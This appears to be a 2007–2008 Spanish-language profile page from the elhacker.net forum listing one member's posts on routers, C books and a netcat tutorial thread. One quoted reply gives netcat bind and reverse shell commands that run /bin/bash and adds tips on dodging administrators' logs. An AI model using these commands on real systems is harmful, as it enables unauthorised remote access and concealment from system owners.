elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Como proteger una cartera - billetera de Bitcoin


  Mostrar Mensajes
Páginas: [1]
1  Seguridad Informática / Materiales y equipos / Re: Dudas sobre routers en: 11 Junio 2008, 15:25 pm
Vale, gracias a los dos, eso es lo que quería saber. Como ya de por sí mi conexión a Internet con Telefónica deja mucho que desear (mucho, mucho), como que me da igual que funcione un poco peor :P.

Vale, entre otras cosas, me hacía ilusión instalar Linux en el router (una tontería, pero es cuestión de autosuperación personal), ¿con ese modelo que me presentas crees que podré hacerlo?. Gracias de nuevo.
2  Seguridad Informática / Materiales y equipos / Dudas sobre routers en: 10 Junio 2008, 18:33 pm
Hola!. Me di cuenta hace unos días que esto de las redes Wireless es mucho más interesante de lo que creía a simple vista :P.

Bien, verán, estaba pensando adquirir un Linksys WRTSL54GS para empezar a jugar un rato. Pero me surgen algunas dudas, yo tengo telefónica con un router Zyxel 660 HW-61. ¿Puedo hacer convivir ambos y disfrutar de la conexión sin problemas? ¿cómo?.

Gracias desde ya.
3  Seguridad Informática / Hacking / Re: Jugando con netcat en: 19 Abril 2008, 12:17 pm
Thylzos:
Eterm NO es un intérprete de comandos sino un emulador de terminal. lo que deberías ejecutar es el shell que deseas abrir, ya sea bash (/bin/bash), sh, csh, python, o cualquier shell o programa capáz de aceptar STDIN y STDOUT  ;D.
Si ejecutas Eterm, le saldrá eterm al usuario, y te quedarás con la salida de consola que son los errores, y toda la salida que eterm haga al STDOUT o STDERR fuera de su interfaz.
deberías usar "nc -l -vv -e /bin/bash -p 80" en la máquina ajena y "nc -vv IP 80" en la tuya o bien inversa haciendo "nc -vv -e /bin/bash TU_IP 80" en la máquina con Linux y "nc -vv -l -p 80" en la tuya.

El problema es que Linux no te permitirá usar un puerto privilegiado sin privilegios, asíque deberás conectar por uno como el 3000 o algo así. Otro problema es que TODAS las shells en Linux crean Logs a los que no podrás acceder, y eso significa que cualquier medianamente buen administrador se dará cuenta de tu presencia.
Otro tema es que sin privilegios de root no podrás hacer nada entretenido en el sistema (No es como Winbug$).

Para concluir, deberás conocer un poco del funcionamiento de Linux, y obtener privilegios, si deseas que esa shell se te conecte cada cierto tiempo, o cada inicio.

Lo mejor cuando te introduces en un sistema Linux así es usar un intérprete como csh cuyos logs no se suelen andar visando, a menos que uses un script o un programa como ACID Lab, en ese caso estás frito porque no solo se darán cuenta que estás, sino que a demás te sacarán el IP.
Jeje... te creiste que entrar en Linux era cosa de juego como entrar en Windoze? >:D

LinuX RuleZ!

Ni de lejos... lo que quería era configurar mi sistema para que pueda acceder remotamente :P. Gracias, ahora ya sé qué me deba el error ;).
4  Seguridad Informática / Hacking / Re: Jugando con netcat en: 12 Abril 2008, 10:31 am
Vale, me acaba de surgir una duda respecto a la tercera práctica. ¿Qué pasa si la uso en Linux, hago que en vez de ejecutar cmd (como es lógico, no está en Linux :P), se ejecute un Eterm e ingreso a mi ordenador remotamente desde Windows?, gracias desde ya.
5  Programación / Programación C/C++ / Re: Manuales, tutoriales, libros de C/C++: Aqui en: 30 Noviembre 2007, 16:55 pm
Una pregunta, ¿tenes por ahí el algún lugar donde descargar El lenguaje de programación C de Brian W. Kernighan y Dennis Ritchie? gracias (si es en español mejor)
6  Seguridad Informática / Hacking / Re: Jugando con netcat en: 26 Octubre 2007, 14:49 pm

Muchas gracias ;).
7  Seguridad Informática / Hacking / Re: Jugando con netcat en: 25 Octubre 2007, 16:42 pm
Gracias, yo lo unico que quería era ver eso... cuando lo tengas avisame :)
8  Seguridad Informática / Hacking / Re: Jugando con netcat en: 25 Octubre 2007, 15:35 pm
Las imagenes ya no existen porque imageshack ya me expiró, subirimagenes también, sitehacking ya no existe e iespana no deja linkear imagenes.

Joder que mala suerte, ¿me podés pasar la que sea que iba después de: "Solo ejecutamos esto y estaremos listos para recibir la conexión de quien abra la carnada:"?, gracias
9  Seguridad Informática / Hacking / Re: [Manual] Hackear Windows Vista en: 21 Octubre 2007, 10:54 am
Citar
No me funciona, he probado primero con un usuario (admin) y luego con dos (admin + user) para estar seguro, y me manda el mismo mensajito

Cita de: launch.sh;bash
No partition containing hashes found !!

Saludos

A mí tampoco me la encuentra, ¿alguien sabe exactamente, por qué es?
10  Seguridad Informática / Hacking / Re: Jugando con netcat en: 16 Octubre 2007, 16:02 pm
Che, estoy comenzando a ver el tutorial, pero las imágenes no puedo verlas, ¿podes renovarlas?
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines